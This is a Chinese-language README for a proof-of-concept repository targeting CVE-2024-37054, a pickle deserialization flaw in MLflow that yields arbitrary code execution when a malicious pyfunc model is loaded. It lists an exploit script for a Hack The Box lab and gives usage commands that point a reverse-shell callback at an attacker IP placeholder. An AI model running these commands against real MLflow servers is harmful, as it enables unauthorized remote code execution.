jimmexploit/CVE-2024-37054-PoC

# 概述 CVE-2024-37054 的概念验证代码，该漏洞是 MLflow 0.9.0 至 2.14.1 版本中的一个严重反序列化漏洞。 当通过 `mlflow.pyfunc.load_model()` 加载恶意的 pyfunc 模型时，pickle 序列化的有效载荷会执行任意代码。 ## 文件列表 - `exploit.py` — 完整的利用程序：注册、训练、上传、触发（用于 HTB SmartHire 靶机） - `build_model.py` — 本地构建恶意模型（仅构建） ## 使用说明 ### 本地构建模型 ``` python3 build_model.py --lhost YOUR_IP --lport 4444 ``` ### 运行完整利用程序 ``` # 自动注册账户并利用 python3 exploit.py --lhost YOUR_IP --lport 4444 --atoz # 使用现有会话 python3 exploit.py --lhost YOUR_IP --lport 4444 --session "eyJjb21w..." ``` ## 免责声明 仅用于教育目的和经过授权的渗透测试。

标签：CVE-2024-37054, MLflow, pickle漏洞, 代码执行, 任意代码执行, 反序列化漏洞, 威胁模拟, 密钥泄露防护, 机器学习安全, 概念验证, 模型加载漏洞, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护